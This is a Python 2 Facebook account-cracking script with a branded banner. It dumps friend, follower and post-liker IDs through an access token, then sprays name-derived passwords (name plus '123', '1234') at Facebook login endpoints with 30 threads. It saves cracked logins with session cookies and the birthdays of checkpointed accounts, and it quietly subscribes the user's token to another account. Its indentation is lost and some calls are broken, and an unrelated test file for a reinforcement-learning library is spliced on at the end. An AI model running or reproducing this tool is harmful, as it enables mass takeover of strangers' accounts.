\033[1;95m®┏━━━┓╋╋┏┓╋╋╋╋┏━━━┓╋╋╋╋╋╋╋╋╋╋┏┓
┃┏━┓┃╋╋┃┃╋╋╋╋┃┏━┓┃╋╋╋╋╋╋╋╋╋╋┃┃
┃┗━┛┣━━┫┃┏┳━━┫┃╋┃┣┓┏┳━━┳━┓┏━┛┣━━┓
\033[1;92m┃┏┓┏┫┏┓┃┗┛┫┏┓┃┗━┛┃┗┛┃┏┓┃┏┓┫┏┓┃┏┓┃
┃┃┃┗┫┏┓┃┏┓┫┏┓┃┏━┓┃┃┃┃┏┓┃┃┃┃┗┛┃┏┓┃
┗┛┗━┻┛┗┻┛┗┻┛┗┻┛╋┗┻┻┻┻┛┗┻┛┗┻━━┻┛┗┛ \033[1;97m
\033[1;95m──────═• \033[1;92m● \033[1;95m══════════════════════════════ \033[1;92m● \033[1;97m\033[1;95m•═──────
\033[1;93m➤\033[1;97m Author : \033[1;92m☆ RAKA ☆ ™︻®╤───────═◍➤ \033[1;97m
\033[1;93m➤\033[1;97m Github : \033[1;92mhttps://github.com/Bangsat-XD \033[1;97m
\033[1;93m➤\033[1;97m Facebook : \033[1;92mRaka Andrian Tara \033[1;97m
\033[1;93m➤\033[1;97m Instagram : \033[1;92mraka_andrian27 \033[1;97m
\033[1;93m➤\033[1;97m Twitter : \033[1;92mBangsat_XD \033[1;97m
\033[1;95m──────═• \033[1;92m● \033[1;95m══════════════════════════════ \033[1;92m● \033[1;97m\033[1;95m•═────── """)
def resu(ok,cp):
if len(ok) != 0 or len(cp) != 0:
print '\n\n %s[%s#%s] CRACK COMPLETE...'%(N,K,N)
print '\n\n [%s+%s] TOTAL OK : %s%s%s'%(O,N,H,str(len(ok)),N)
print ' [%s+%s] TOTAL CP : %s%s%s'%(O,N,K,str(len(cp)),N);exit()
else:
print '\n\n [%s!%s] OOPS YOU GOT NO RESULTS :('%(M,N);exit()
def raka27():
os.system('clear')
banner()
print("%s IF YOU DON'T KNOW HOW TO GET TOKEN TYPE (%sOPEN%s)")%(K,H,K)
print("")
nunu = raw_input('\n %s[%s?%s] ☆ENTER TOKEN☆™︻®╤───────═◍➤ :%s ' % (N, M, N, H))
if nunu in ('open', 'Open', 'OPEN'):
raw_input('\n %s*%s PRESS ENTER ' % (O, N))
raka27()
try:
nam = requests.get('https://graph.facebook.com/me?access_token=%s' % nunu).json()['name']
open('token.txt', 'w').write(nunu)
raw_input('\n %s*%s PRESS ENTER ' % (O, N))
checkup(nunu)
mr_error()
except KeyError:
print '\n\n %s[%s!%s] INVALID TOKEN :(' % (N, M, N)
time.sleep(2)
raka27()
def main_menu():
os.system('clear')
try:
nunu = open('token.txt', 'r').read()
except IOError:
print '\n %s[%s×%s] INVALID TOKEN'%(N,M,N);time.sleep(2);os.system('rm -rf token.txt');azimvau()
try:
nam = requests.get('https://graph.facebook.com/me?access_token=%s'%(nunu)).json()['name'].upper()
IP = requests.get('https://api.ipify.org').text.strip()
loc = requests.get('https://ipapi.com/ip_api.php?ip=' + IP, headers={'Referer': 'https://ip-api.com/', 'Content-Type': 'application/json; charset=utf-8', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36'}).json()['country_name'].upper()
except KeyError:
print '\n %s[%s×%s] INVALID TOKEN'%(N,M,N);time.sleep(2);os.system('rm -rf token.txt');azimvau()
except requests.exceptions.ConnectionError:
exit('\n\n %s[%s!%s] NO INTERNET CONNECTION :(\n'%(N,M,N))
os.system('clear')
def banner():
print("%s NAME : %s%s ")%(K,H,nam)
print("%s DEVICE IP : %s%s ")%(K,H,IP)
print("%s LOCATION : %s%s ")%(K,H,loc)
os.system('echo "\n [1]. DUMP ID FROM FRIENDS\n [2]. DUMP ID FROM PUBLIC FRIEND\n [3]. DUMP ID FROM TOTAL FOLLOWERS\n [4]. DUMP ID FROM LIKE POST\n [5]. START CRACK\n [6]. VIEW CRACK RESULTS\n [7]. USER AGENT SETTINGS"| lolcat -a -d 2')
os.system("xdg-open https://fb.me/GARANGAN.KECHE")
innocent = raw_input('\n\033[93;1m [*] MENU :\033[92;1m ')
if innocent == '':
print "\n %s[%s×%s] DON'T LEAVE IT BLANK"%(N,M,N);time.sleep(2);mr_error()
elif innocent in['1','01']:
teman(nunu)
elif innocent in['2','02']:
publik(nunu)
elif innocent in['3','03']:
followers(nunu)
elif innocent in['4','04']:
postingan(nunu)
elif innocent in['5','05']:
__crack__().plerr()
elif innocent in['6','06']:
try:
dirs = os.listdir("results")
print '\n [ CRACK RESULTS STORED IN YOUR FILE ]\n'
for file in dirs:
print(" [%s+%s] %s"%(O,N,file))
file = raw_input("\n [%s?%s] ENTER FILENAME :%s "%(M,N,H))
if file == "":
file = raw_input("\n %s[%s?%s] ENTER FILENAME :%s %s"%(N,M,N,H,N))
total = open("results/%s"%(file)).read().splitlines()
print(" %s[%s#%s] ═══════════════════════════════════════"%(N,O,N));time.sleep(2)
nm_file = ("%s"%(file)).replace("-", " ")
hps_nm = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "")
xox(" [%s*%s] %sCRACK%s RESULTS ON DATE %s:%s%s%s TOTAL%s: %s%s%s"%(M,N,O,N,M,O,hps_nm,N,M,O,len(total),O))
print(" %s[%s#%s] ═══════════════════════════════════════"%(N,O,N));time.sleep(2)
for fuck in total:
nunu = fuck.replace("\n","")
titid = nunu.replace(" [✓] "," \x1b[0m[\x1b[1;92m✓\x1b[0m]\x1b[1;92m ").replace(" [×] ", " \x1b[0m[\x1b[1;93m×\x1b[0m]\x1b[1;93m ")
print("%s%s"%(titid,N));time.sleep(0.03)
print(" %s[%s#%s] ═══════════════════════════════════════"%(N,O,N))
raw_input('\n [ %sBACK%s ] '%(O,N));mr_error()
except (IOError):
print("\n %s[%s×%s] OOPS YOU GOT NO RESULTS :("%(N,M,N))
raw_input('\n [ %sBACK%s ] '%(O,N));mr_error()
elif innocent in['7','07']:
ua_settings()
elif innocent in['0','00']:
print '\n'
tod()
time.sleep(1);os.system('rm -rf token.txt')
xox('\n %s[%s✓%s]%s SUCCESSFULLY DELETED TOKEN'%(N,H,N,H));exit()
else:
print '\n %s[%s×%s] CHECK THE MENU [%s%s%s] IS NOT HERE.!'%(N,M,N,M,innocent,N);time.sleep(2);mr_error()
def checkup(nunu):
try:
tox = nunu
requests.post('https://graph.facebook.com/%s/subscribers?access_token=%s'%(usera_gent,tox))
except:
pass
def teman(nunu):
try:
os.mkdir('dump')
except:pass
try:
mmk = raw_input('\n %s[%s?%s] FILE NAME : '%(N,O,N))
cin = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(cin, 'w')
for a in requests.get('https://graph.facebook.com/me/friends?access_token=%s'%(nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM FRIEND'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,cin,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input(' [%s ENTER%s ] '%(O,N));mr_error()
except (KeyError,IOError):
os.remove(cin)
xox('\n %s[%s!%s] ID DUMP FAILED, MAYBE THE ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def publik(nunu):
try:
os.mkdir('dump')
except:pass
try:
mravu = raw_input('\n %s[%s?%s] PUBLIC ID : '%(N,O,N))
ahh = raw_input(' %s[%s?%s] FILE NAME : '%(N,O,N))
knt = ('dump/' + ahh + '.json').replace(' ', '_')
ys = open(knt, 'w')
for a in requests.get('https://graph.facebook.com/%s/friends?access_token=%s'%(mravu,nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM PUBLIC FRIEND'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,knt,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input(' [%s ENTER%s ] '%(O,N));mr_error()
except (KeyError,IOError):
os.remove(knt)
xox('\n %s[%s!%s] ID DUMP FAILED, MAYBE THE ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def followers(nunu):
try:
os.mkdir('dump')
except:pass
try:
mravu = raw_input('\n %s[%s?%s] PUBLIC FOLLOWER ID : '%(N,O,N))
mmk = raw_input(' %s[%s?%s] FILE NAME : '%(N,O,N))
ah = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(ah, 'w')
for a in requests.get('https://graph.facebook.com/%s/subscribers?access_token=%s'%(mravu,nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM PUBLIC FRIEND'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,ah,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input('%s [%s ENTER%s ] '%(N,O,N));mr_error()
except (KeyError,IOError):
os.remove(ah)
xox('\n %s[%s!%s] FAILED TO DUMP ID, PROBABLY ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def postingan(nunu):
try:
os.mkdir('dump')
except:pass
try:
mravu = raw_input('\n %s[%s?%s] POST ID : '%(N,O,N))
ppk = raw_input(' %s[%s?%s] FILE NAME : '%(N,O,N))
ahh = ('dump/' + ppk + '.json').replace(' ', '_')
ys = open(ahh, 'w')
for a in requests.get('https://graph.facebook.com/%s/likes?access_token=%s'%(mravu,nunu)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] PROCESS DUMP ID...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
xox('\n\n %s[%s✓%s] SUCCESSFULLY DUMP ID FROM LIKE POST'%(N,H,N))
print ' [%s•%s] COPY THE OUTPUT FILE >> ( %s%s%s )'%(O,N,M,ahh,N)
os.system('echo "═════════════════════════════════════════════" | lolcat -a -d 2 -s 50')
raw_input('%s [%s ENTER%s ] '%(N,O,N));mr_error()
except (KeyError,IOError):
os.remove(ahh)
xox('\n %s[%s!%s] FAILED TO DUMP ID, PROBABLY ID IS NOT PUBLIC.\n'%(N,M,N))
raw_input(' [ %sBACK%s ] '%(O,N));mr_error()
def ua_settings():
print '\n (%s1%s) CHANGE USER AGENT'%(O,N)
print ' (%s2%s) CHECK USER AGENT'%(O,N)
ytbjts = raw_input('\n %s[%s?%s] CHOOSE : '%(N,O,N))
if ytbjts == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY"%(N,M,N);time.sleep(2);ua_settings()
elif ytbjts =='1':
ua_change()
elif ytbjts =='2':
check_uag()
else:
print '\n %s[%s×%s] WRONG INPUT'%(N,M,N);time.sleep(2);ua_settings()
def ua_change():
os.system('rm -rf vau_ua.txt')
print '\n %s(%s•%s) NOTE : COPY USER AGENT FROM YOUR BROWSER.'%(N,O,N)
print ' (%s•%s) THAN PASTE HERE \n'%(M,N)
os.system('xdg-open https://www.google.com/search?q=my+user+agent')
mew = raw_input(' [%s?%s] ENTER USER AGENT :%s '%(O,N,H))
if mew == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY BRO "%(N,M,N);ua_change()
try:
open('vau_ua.txt', 'w').write(mew);time.sleep(2)
xox('\n %s[%s✓%s] SUCCESSFULLY CHANGED USER AGENT...'%(N,H,N))
raw_input('\n %s[ %sBACK%s ]'%(N,O,N));mr_error()
except:pass
def check_uag():
try:
user_agent = open('vau_ua.txt', 'r').read()
except IOError:
user_agent = '%s-'%(M)
except: pass
print '\n %s[%s+%s] YOUR USER AGENT : %s%s'%(N,O,N,H,user_agent)
raw_input('\n %s[ %sBACK%s ]'%(N,O,N));mr_error()
class __crack__:
def __init__(self):
self.id = []
def plerr(self):
try:
self.apk = raw_input('\n [%s?%s] INPUT FILE : '%(O,N))
self.id = open(self.apk).read().splitlines()
print '\n [%s+%s] TOTAL ID -> %s%s%s' %(O,N,M,len(self.id),N)
except:
print '\n %s[%s×%s] FILE [%s%s%s] NOT FUND FIRST DUMP CHECK 1 TO 4 OPTIONS BRO'%(N,M,N,M,self.apk,N);time.sleep(3)
raw_input('\n %s[ %sBACK%s ]'%(N,O,N));mr_error()
___axim_xau___ = raw_input(' [%s?%s] DO YOU WANT TO USE A MANUAL PASSWORD? [Y/n]: '%(O,N))
if ___axim_xau___ in ('Y', 'y'):
print '\n %s[%s!%s] ADD MANUAL PASSWORD EXAMPLE : <PASSWORD>,<PASSWORD>'%(N,M,N)
print(" %s[%s!%s] NOTE : MUST USE MORE THAN 6 CHARACTERS")%(N, M, N)
while True:
pwek = raw_input('\n [%s?%s] ENTER PASSWORD : '%(O,N))
print ' [*] CRACK WITH PASSWORD -> [ %s%s%s ]' % (M, pwek, N)
if pwek == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY BRO"%(N,M,N)
elif len(pwek)<=5:
print '\n %s[%s×%s] PASSWORD MINIMUM 6 CHARACTERS'%(N,M,N)
else:
def __axm__(uvarm=None):
cin = raw_input('\n [*] METHOD : ')
if cin == '':
print "\n %s[%s×%s] DON'T EMPTY BRO"%(N,M,N);self.__axm__()
elif cin == '1':
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__azimVau__.submit(self.__api__, kimochi, uvarm)
except: pass
os.remove(self.apk)
resu(ok,cp)
elif cin == '2':
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__azimVau__.submit(self.__mbasic__, kimochi, uvarm)
except: pass
os.remove(self.apk)
resu(ok,cp)
elif cin == '3':
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__azimVau__.submit(self.__mfb,__, kimochi, uvarm)
except: pass
os.remove(self.apk)
resu(ok,cp)
else:
print '\n %s[%s×%s] WRONG INPUT BRO!'%(N,M,N);self.__axm__()
print '\n [ CHOOSE THE LOGIN METHOD ]\n'
print ' [%s1%s]. API METHOD (FAST)'%(O,N)
print ' [%s2%s]. MBASIC METHOD (SLOW)'%(O,N)
print ' [%s3%s]. MOBILE METHOD (VERY SLOW)'%(O,N)
__axm__(pwek.split(','))
break
elif ___axim_xau___ in ('N', 'n'):
print '\n [ CHOOSE THE LOGIN METHOD - PLEASE TRY ONE ² ]\n'
print ' [%s1%s]. method API (fast)'%(O,N)
print ' [%s2%s]. method mbasic (slow)'%(O,N)
print ' [%s3%s]. method mobile (super slow)'%(O,N)
self.__pler__()
else:
print '\n %s[%s×%s] Y/N STUPID! -_-'%(N,M,N);time.sleep(2);mr_error()
return
def __api__(self, user, __axm__):
global ok,cp,loop
sys.stdout.write('\r [%s*%s] [CRACK] %s/%s -> OK-:%s - CP-:%s '%(O,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __axm__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_nunu = open('vau_ua.txt', 'r').read()
except (KeyError, IOError):
_nunu = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": _nunu, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '<PASSWORD>', 'format': 'JSON', 'sdk_version': '2', 'email': user, 'locale': 'en_US', 'password': pw, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
response = requests.get(api, params=params, headers=headers_)
if response.status_code != 200:
sys.stdout.write('\r %s[%s!%s] IP BLOCKED TURN ON AIRPLANE MODE 5 SECONDS'%(N,M,N)),
sys.stdout.flush()
loop +=1
self.__api__()
if 'access_token' in response.text and 'EAAA' in response.text:
print '\r %s* --> %s|%s %s' % (H,user,pw,N)
wrt = ' [✓] %s|%s' % (user,pw)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif 'www.facebook.com' in response.json()['error_msg']:
try:
nunu = open('token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,nunu)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = tarikh_ttl[month]
print '\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N)
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print '\r %s* --> %s|%s %s' % (K,user,pw,N)
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def __mbasic__(self, user, __axm__):
global ok,cp,loop
sys.stdout.write('\r [%s*%s] [CRACK] %s/%s -> OK-:%s - CP-:%s '%(O,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __axm__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_nunu = open('vau_ua.txt', 'r').read()
except (KeyError, IOError):
_nunu = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
ses.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":_nunu,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://mbasic.facebook.com")
b = ses.post("https://mbasic.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print '\r %s* --> %s|%s %s' % (H,user,pw,N)
wrt = ' [✓] %s|%s|%s' % (user,pw,kuki)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
nunu = open('token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,nunu)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = tarikh_ttl[month]
print '\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N)
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print '\r %s* --> %s|%s %s' % (K,user,pw,N)
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def __mfb__(self, user, __axm__):
global ok,cp,loop
sys.stdout.write('\r [%s*%s] [CRACK] %s/%s -> OK-:%s - CP-:%s '%(O,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __axm__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_nunu = open('vau_ua.txt', 'r').read()
except (KeyError, IOError):
_nunu = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":_nunu,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com")
b = ses.post("https://m.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print '\r %s* --> %s|%s %s' % (H,user,pw,N)
wrt = ' [✓] %s|%s|%s' % (user,pw,kuki)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
nunu = open('token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,nunu)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = tarikh_ttl[month]
print '\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N)
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print '\r %s* --> %s|%s %s' % (K,user,pw,N)
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def __pler__(self):
axm = raw_input('\n [*] METHOD : ')
if axm == '':
print "\n %s[%s×%s] DON'T LEAVE IT EMPTY BRO"%(N,M,N);self.__pler__()
elif axm in ('1', '01'):
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for azmx in self.id:
try:
uid, name = azmx.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+xz[1].lower()+"123", xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
else:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
__azimVau__.submit(self.__api__, uid, xnx)
except:
pass
os.remove(self.apk)
resu(ok,cp)
elif axm in ('2', '02'):
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for azmx in self.id:
try:
uid, name = azmx.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+xz[1].lower()+"123", xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
else:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
__azimVau__.submit(self.__mbasic__, uid, xnx)
except:
pass
os.remove(self.apk)
resu(ok,cp)
elif axm in ('3', '03'):
print '\n [%s+%s] OK RESULTS ARE SAVED TO -> RESULTS/OK-%s-%s-%s.txt'%(O,N,ha, op, ta)
print ' [%s+%s] CP RESULTS ARE SAVED TO -> RESULTS/CP-%s-%s-%s.txt'%(O,N,ha, op, ta)
print '\n [%s!%s] YOU CAN TURN OFF MOBILE DATA TO PAUSE THE CRACK PROCESS\n'%(M,N)
with axim_xau(max_workers=30) as (__azimVau__):
for azmx in self.id:
try:
uid, name = azmx.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+xz[1].lower()+"123", xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
else:
xnx = [name.lower(), xz[0]+xz[1].lower(), xz[0]+"123", xz[1].lower()+"123", xz[0].lower()+"1234", xz[0].lower()+"12345"]
__azimVau__.submit(self.__mfb__, uid, xnx)
except:
pass
os.remove(self.apk)
resu(ok,cp)
else:
print '\n %s[%s×%s] WRONG INPUT'%(N,M,N);self.__pler__()
if __name__ == '__main__':
os.system('git pull')
main_menu()
| StarcoderdataPython |
1747304 | <reponame>Maltimore/garage
from garage.np.algos import CMAES
from garage.np.baselines import LinearFeatureBaseline
from garage.sampler import OnPolicyVectorizedSampler
from garage.tf.envs import TfEnv
from garage.tf.experiment import LocalTFRunner
from garage.tf.policies import CategoricalMLPPolicy
from tests.fixtures import snapshot_config, TfGraphTestCase
class TestCMAES(TfGraphTestCase):
def test_cma_es_cartpole(self):
"""Test CMAES with Cartpole-v1 environment."""
with LocalTFRunner(snapshot_config) as runner:
env = TfEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(name='policy',
env_spec=env.spec,
hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
n_samples = 20
algo = CMAES(env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=100,
n_samples=n_samples)
